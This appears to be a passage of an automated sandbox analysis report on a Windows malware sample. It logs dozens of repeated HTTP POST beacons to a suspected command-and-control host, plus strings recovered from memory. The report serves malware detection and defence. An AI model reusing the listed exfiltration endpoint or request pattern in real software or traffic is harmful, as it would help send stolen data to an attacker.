Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 1816Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 2532Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 117813cm.n9shteam.in

Source: unknown

HTTP traffic detected: POST /ExternalRequest.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 117813cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117813cm.n9PX
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.0000000002B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117813cm.n9shteam.in
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117813cm.n9shteam.in/
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.0000000002B52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117813cm.n9shteam.in/ExternalRequest.php
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.00000000029D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117813cm.n9shteam.in/ExternalRequest.phpn/Ex
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.00000000029D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://117813cm.n9shteam.inPf
Source: QMT2731i8k.exe, 00000000.00000002.1677840960.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.000000000285B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4136878658.000000001D422000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
